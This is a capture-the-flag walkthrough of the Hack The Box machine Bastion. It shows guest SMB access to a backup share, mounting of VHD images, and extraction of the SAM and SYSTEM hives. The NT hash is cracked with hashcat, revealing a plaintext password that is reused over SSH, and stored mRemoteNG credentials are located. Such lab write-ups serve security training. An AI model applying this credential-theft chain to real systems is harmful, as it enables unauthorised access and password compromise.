In this practice box from Hack The Box (HTB) we work through Bastion (10.10.10.134), one of the machines on TJNull's list, which is widely used as preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull's curated list exists to help people hone their penetration testing skills and get used to the kind of challenges they will face during the OSCP. This box reflects the practical, hands-on nature of the OSCP: an exposed backup share, offline credential extraction, password reuse, and a remote-connection manager that stores credentials it cannot actually protect. Whether you are a seasoned security professional or just starting, working through it is a useful step in OSCP preparation.
Nmap scan
# Nmap 7.94 scan initiated Sun Oct 22 08:26:55 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/bastion/results/10.10.10.134/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/bastion/results/10.10.10.134/scans/xml/_quick_tcp_nmap.xml 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-22 08:27:02 EDT for 33s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-22T14:27:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
| Check 2 (port 37729/tcp): CLEAN (Couldn't connect)
| Check 3 (port 18741/udp): CLEAN (Failed to receive data)
| Check 4 (port 49057/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb2-time:
| date: 2023-10-22T12:27:24
|_ start_date: 2023-10-22T12:25:36
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 22 08:27:35 2023 -- 1 IP address (1 host up) scanned in 39.86 seconds
Using crackmapexec: the target is Windows Server 2016 (build 14393), SMB signing is not required and SMBv1 is still enabled. A null session is refused for share listing:
╭─kali@kali ~/HTB/bastion
╰─$ crackmapexec smb 10.10.10.134 -u '' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [-] Bastion\: STATUS_ACCESS_DENIED
SMB 10.10.10.134 445 BASTION [-] Error enumerating shares: Error occurs while reading from remote(104)
╭─kali@kali ~/HTB/bastion
╰─$
The SMB enumeration run by the autorecon script gave the same result. Null-session share listing is denied, but a Backups share exists and accepts the guest account, so we connect to it directly.
We are able to connect to the Backups share with smbclient and download the files in its root:
╰─$ smbclient \\\\10.10.10.134\\Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Oct 22 08:29:01 2023
.. D 0 Sun Oct 22 08:29:01 2023
nmap-test-file A 260 Sun Oct 22 08:29:02 2023
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
SUGEJFBQIP.txt A 0 Sun Oct 22 08:28:03 2023
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
WUMPBZIALJ.txt A 0 Sun Oct 22 08:27:47 2023
5638911 blocks of size 4096. 1178191 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get SDT65CB.tmp
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> get WUMPBZIALJ.txt
getting file \WUMPBZIALJ.txt of size 0 as WUMPBZIALJ.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
Going through the share we find a WindowsImageBackup directory containing VHD files (Windows image backups). The plan is to mount these so we can browse their contents:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
cd
5638911 blocks of size 4096. 1178057 blocks available
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
cd
5638911 blocks of size 4096. 1178057 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1178057 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
Rather than download a 5 GB VHD, the share is mounted on Kali over CIFS as guest (forcing SMBv1, which crackmapexec showed the server still offers), so the images can be read in place:
╭─kali@kali ~/HTB/bastion/mnt
╰─$ sudo mount -t cifs -o username=guest,password=,vers=1.0 //10.10.10.134/Backups/ ~/HTB/bastion/mnt 32 ↵
╭─kali@kali ~/HTB/bastion/mnt
╰─$ ls
╭─kali@kali ~/HTB/bastion/mnt
╰─$ cd ../
╭─kali@kali ~/HTB/bastion
╰─$ cd mnt
╭─kali@kali ~/HTB/bastion/mnt
╰─$ ls
note.txt SDT65CB.tmp WindowsImageBackup
╭─kali@kali ~/HTB/bastion/mnt
Mounting the VHD with libguestfs, after some research on how to do it: guestfish lists the filesystems inside the image, then guestmount exposes the chosen partition read-only.
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
╰─$ guestfish --ro -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd run : list-filesystems
/dev/sda1: ntfs
Then mount the NTFS partition read-only:
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
╰─$ guestmount -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro /home/kali/HTB/bastion/mount/vhd_mount
╭─kali@kali ~/HTB/bastion/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
╰─$
The first, smaller VHD is only the boot partition and holds nothing of interest:
╭─kali@kali ~/HTB/bastion/mount
╰─$ cd vhd_mount
╭─kali@kali ~/HTB/bastion/mount/vhd_mount
╰─$ ls
Boot bootmgr BOOTSECT.BAK 'System Volume Information'
╭─kali@kali ~/HTB/bastion/mount/vhd_mount
╰─$
The second, larger VHD (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) holds the Windows system volume. Mounted the same way at vhd_mount2 it gives:
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2
╰─$ ls
'$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2
╰─$
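Before reaching for guestmount it helps to know what kind of VHD you are holding: a fixed VHD is raw disk data followed by a 512-byte footer, so a loop device over the file works, whereas dynamic and differencing images need a VHD-aware layer. The following is an added example, not part of the original write-up: a parser for the VHD footer that reads only the last 512 bytes, so it is cheap even for the 5 GB image over the CIFS mount. The field layout follows Microsoft's VHD specification; the sample footer is constructed inside the code and the file path is a placeholder.

```python
import struct
import datetime

# VHD footer: 512 big-endian bytes at the end of the file.
# cookie, features, format version, data offset, timestamp, creator app,
# creator version, creator host OS, original size, current size, cylinders,
# heads, sectors/track, disk type, checksum, unique id, saved state, reserved.
VHD_FOOTER_FMT = ">8sIIQI4sIIQQHBBII16sB427s"
VHD_EPOCH = datetime.datetime(2000, 1, 1, tzinfo=datetime.timezone.utc)
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}
CHECKSUM_OFFSET = 64  # byte offset of the 4-byte checksum inside the footer
assert struct.calcsize(VHD_FOOTER_FMT) == 512


def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum, computed with the checksum field zeroed."""
    zeroed = footer[:CHECKSUM_OFFSET] + b"\0\0\0\0" + footer[CHECKSUM_OFFSET + 4:]
    return (~sum(zeroed)) & 0xFFFFFFFF


def parse_vhd_footer(footer: bytes) -> dict:
    if len(footer) != 512:
        raise ValueError("VHD footer must be exactly 512 bytes")
    (cookie, _features, version, data_offset, ts, creator, _cver, _cos,
     orig_size, cur_size, cyl, heads, spt, disk_type, checksum,
     uid, _saved, _res) = struct.unpack(VHD_FOOTER_FMT, footer)
    if cookie != b"conectix":
        raise ValueError("not a VHD footer (bad cookie %r)" % cookie)
    return {
        "format_version": "%d.%d" % (version >> 16, version & 0xFFFF),
        "disk_type": DISK_TYPES.get(disk_type, "unknown(%d)" % disk_type),
        "current_size": cur_size,
        "original_size": orig_size,
        "created": VHD_EPOCH + datetime.timedelta(seconds=ts),
        "creator": creator.decode("ascii", "replace"),
        "geometry": (cyl, heads, spt),
        "data_offset": data_offset,          # 0xFFFFFFFFFFFFFFFF for fixed images
        "uuid": uid.hex(),
        "checksum_ok": checksum == vhd_checksum(footer),
    }


def read_vhd_info(path: str) -> dict:
    """Read only the trailing 512 bytes, so a multi-GB image on a CIFS mount is cheap to inspect."""
    with open(path, "rb") as fh:
        fh.seek(-512, 2)
        return parse_vhd_footer(fh.read(512))


def mount_hint(info: dict) -> str:
    """Fixed images are raw sectors from offset 0; the others store blocks via an allocation table."""
    if info["disk_type"] == "fixed":
        return "fixed image: raw disk data starts at offset 0, losetup -P / kpartx will do"
    return "%s image: use guestmount/guestfish or qemu-nbd, a plain loop mount will not work" % info["disk_type"]


def build_fixed_vhd_footer(size: int, uid: bytes = b"\x11" * 16) -> bytes:
    """Synthetic fixed-VHD footer (sample data for this example, not taken from the box)."""
    created = datetime.datetime(2019, 2, 22, 12, 43, 51, tzinfo=datetime.timezone.utc)
    ts = int((created - VHD_EPOCH).total_seconds())
    body = struct.pack(VHD_FOOTER_FMT, b"conectix", 2, 0x00010000, 0xFFFFFFFFFFFFFFFF, ts,
                       b"win ", 0x00060001, 0x5769326B,  # creator "win ", host OS "Wi2k"
                       size, size, 0, 0, 0, 2, 0, uid, 0, b"\0" * 427)  # geometry left zero
    return body[:CHECKSUM_OFFSET] + struct.pack(">I", vhd_checksum(body)) + body[CHECKSUM_OFFSET + 4:]


if __name__ == "__main__":
    # Placeholder path: point this at a real .vhd from the mounted Backups share.
    info = parse_vhd_footer(build_fixed_vhd_footer(64 * 1024 * 1024))
    print(info)
    print(mount_hint(info))
```

guestmount handles both image types, which is why it is the safe default on the page; the footer check matters when you want to avoid libguestfs (for instance, to run losetup and then ntfs-3g directly) or when you need the virtual size and creation time of an image before deciding whether it is worth copying.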
Next we go after the local account hashes. They live in the SAM hive under Windows\System32\config, and the SYSTEM hive holds the boot key needed to decrypt them, so both are required.
Copy both SAM and SYSTEM out of the mounted image:
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ ls
BCD-Template DEFAULT SECURITY.LOG2
BCD-Template.LOG DEFAULT.LOG SOFTWARE
COMPONENTS DEFAULT.LOG1 SOFTWARE.LOG
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms DEFAULT.LOG2 SOFTWARE.LOG1
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms Journal SOFTWARE.LOG2
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms RegBack SYSTEM
COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf SAM SYSTEM.LOG
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf SAM.LOG SYSTEM.LOG1
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms SAM.LOG1 SYSTEM.LOG2
COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms SAM.LOG2 systemprofile
COMPONENTS.LOG SECURITY TxR
COMPONENTS.LOG1 SECURITY.LOG
COMPONENTS.LOG2 SECURITY.LOG1
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ cp SAM /home/kali/HTB/bastion
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$ cp SYSTEM /home/kali/HTB/bastion
╭─kali@kali ~/HTB/bastion/mount/vhd_mount2/Windows/System32/config
╰─$
Dump the hashes with samdump2, which uses the boot key from the SYSTEM hive to decrypt the SAM entries:
╭─kali@kali ~/HTB/bastion
╰─$ samdump2 SYSTEM SAM -o sam.txt 255 ↵
╭─kali@kali ~/HTB/bastion
╰─$ cat sam.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
╭─kali@kali ~/HTB/bastion
╰─$
Using hashcat to crack the password. hash.txt contains only the NT hash (the fourth field of the L4mpje line); the LM field aad3b435b51404eeaad3b435b51404ee is the constant for an empty LM hash and carries nothing to attack. Mode 1000 is NTLM in hashcat's naming, i.e. the NT hash:
╭─kali@kali /usr/bin
╰─$ ./hashcat -m 1000 ~/HTB/bastion/hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Mon Oct 23 06:59:06 2023 (12 secs)
Time.Estimated...: Mon Oct 23 06:59:18 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1075.3 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: burlfish85 -> burbank105
Hardware.Mon.#1..: Util: 41%
Started: Mon Oct 23 06:59:01 2023
Stopped: Mon Oct 23 06:59:19 2023
╭─kali@kali /usr/bin
Username/password: L4mpje / bureaulampje
Logging in over SSH with these credentials works. The backup came from L4mpje-PC, but the same password is valid on Bastion:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
systeminfo is denied to this account:
l4mpje@BASTION C:\Program Files>systeminfo
ERROR: Access denied
l4mpje@BASTION C:\Program Files>
whoami /all shows a plain local user with only the default privileges, so there is no quick token-based escalation:
l4mpje@BASTION C:\Users\L4mpje>whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
bastion\l4mpje S-1-5-21-2146344083-2443430429-1430880910-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
WinPEAS turned up nothing useful, so we look through the filesystem by hand, starting with the installed software:
Directory of C:\Program Files
31-01-2022 18:39 <DIR> .
31-01-2022 18:39 <DIR> ..
16-04-2019 12:18 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
22-02-2019 15:19 <DIR> OpenSSH-Win64
22-02-2019 15:08 <DIR> PackageManagement
31-01-2022 18:39 <DIR> VMware
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
22-02-2019 15:08 <DIR> WindowsPowerShell
0 File(s) 0 bytes
15 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\Program Files>cd ../
l4mpje@BASTION C:\>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\
16-04-2019 12:02 <DIR> Backups
12-09-2016 13:35 <DIR> Logs
22-02-2019 15:42 <DIR> PerfLogs
31-01-2022 18:39 <DIR> Program Files
22-02-2019 15:01 <DIR> Program Files (x86)
23-10-2023 13:20 <DIR> temp
22-02-2019 14:50 <DIR> Users
31-01-2022 18:52 <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\>cd
C:\
l4mpje@BASTION C:\>cd "Program Files (x86)"
l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Program Files (x86)
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
16-07-2016 15:23 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
16-07-2016 15:23 <DIR> Microsoft.NET
22-02-2019 15:01 <DIR> mRemoteNG
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
16-07-2016 15:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 4.820.283.392 bytes free
l4mpje@BASTION C:\Program Files (x86)>cd mRemoteNG
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Program Files (x86)\mRemoteNG
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
18-10-2018 23:31 36.208 ADTree.dll
18-10-2018 23:31 346.992 AxInterop.MSTSCLib.dll
18-10-2018 23:31 83.824 AxInterop.WFICALib.dll
18-10-2018 23:31 2.243.440 BouncyCastle.Crypto.dll
18-10-2018 23:30 71.022 Changelog.txt
18-10-2018 23:30 3.224 Credits.txt
22-02-2019 15:01 <DIR> cs-CZ
22-02-2019 15:01 <DIR> de
22-02-2019 15:01 <DIR> el
22-02-2019 15:01 <DIR> en-US
22-02-2019 15:01 <DIR> es
22-02-2019 15:01 <DIR> es-AR
22-02-2019 15:01 <DIR> Firefox
22-02-2019 15:01 <DIR> fr
18-10-2018 23:31 1.966.960 Geckofx-Core.dll
05-07-2017 01:31 4.482.560 Geckofx-Core.pdb
18-10-2018 23:31 143.728 Geckofx-Winforms.dll
05-07-2017 01:31 259.584 Geckofx-Winforms.pdb
22-02-2019 15:01 <DIR> Help
22-02-2019 15:01 <DIR> hu
22-02-2019 15:01 <DIR> Icons
18-10-2018 23:31 607.088 Interop.MSTSCLib.dll
18-10-2018 23:31 131.440 Interop.WFICALib.dll
22-02-2019 15:01 <DIR> it
22-02-2019 15:01 <DIR> ja-JP
22-02-2019 15:01 <DIR> ko-KR
07-10-2018 13:21 18.326 License.txt
18-10-2018 23:31 283.504 log4net.dll
18-10-2018 23:31 412.528 MagicLibrary.dll
18-10-2018 23:31 1.552.240 mRemoteNG.exe
07-10-2018 13:21 28.317 mRemoteNG.exe.config
18-10-2018 23:30 2.405.888 mRemoteNG.pdb
22-02-2019 15:01 <DIR> nb-NO
22-02-2019 15:01 <DIR> nl
18-10-2018 23:31 451.952 ObjectListView.dll
22-02-2019 15:01 <DIR> pl
22-02-2019 15:01 <DIR> pt
22-02-2019 15:01 <DIR> pt-BR
07-10-2018 13:21 707.952 PuTTYNG.exe
07-10-2018 13:21 887 Readme.txt
18-10-2018 23:31 415.088 Renci.SshNet.dll
22-02-2019 15:01 <DIR> ru
22-02-2019 15:01 <DIR> Schemas
22-02-2019 15:01 <DIR> Themes
22-02-2019 15:01 <DIR> tr-TR
22-02-2019 15:01 <DIR> uk
18-10-2018 23:31 152.432 VncSharp.dll
18-10-2018 23:31 312.176 WeifenLuo.WinFormsUI.Docking.dll
18-10-2018 23:31 55.152 WeifenLuo.WinFormsUI.Docking.ThemeVS2003.dll
18-10-2018 23:31 168.816 WeifenLuo.WinFormsUI.Docking.ThemeVS2012.dll
18-10-2018 23:31 217.968 WeifenLuo.WinFormsUI.Docking.ThemeVS2013.dll
18-10-2018 23:31 243.056 WeifenLuo.WinFormsUI.Docking.ThemeVS2015.dll
22-02-2019 15:01 <DIR> zh-CN
22-02-2019 15:01 <DIR> zh-TW
28 File(s) 17.802.352 bytes
28 Dir(s) 4.820.283.392 bytes free
Investigating mRemoteNG, the one third-party application under Program Files (x86). Remote-connection managers store credentials for the hosts they connect to, which makes them a prime target. The Readme:
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type readme.txt
mRemoteNG is the next generation of mRemote, a full-featured, multi-tab remote connections manager.
It allows you to store all your remote connections in a simple yet powerful interface.
Currently these protocols are supported:
* RDP (Remote Desktop)
* VNC (Virtual Network Computing)
* ICA (Independent Computing Architecture)
* SSH (Secure Shell)
* Telnet (TELecommunication NETwork)
* HTTP/S (Hypertext Transfer Protocol)
* Rlogin (Rlogin)
* RAW
mRemoteNG can be installed on Windows 7 or later.
Windows 7 systems require RDP version 8:
https://support.microsoft.com/en-us/kb/2592687
OR
https://support.microsoft.com/en-us/kb/2923545
Windows 8+ support RDP version 8+ out of the box.
RDP versions are backwards compatible, so an mRemoteNG client running on Windows 10 can connection successfully to a Windows 200
3 host (for example).
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>
Checking the changelog for the installed version: 1.76.11. This branch of mRemoteNG encrypts saved connection passwords with AES-GCM under a master password that falls back to a hard-coded default (mR3m) when the user never set one, so anyone who can read the configuration file can recover them.
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>type Changelog.txt
1.76.11 (2018-10-18):
Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized
This article covers locating and decrypting mRemoteNG saved passwords: https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/. The connection file confCons.xml lives under %APPDATA%\mRemoteNG, not in the AppData\Roaming root:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>type confCons.xml
The system cannot find the file specified.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>cd mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
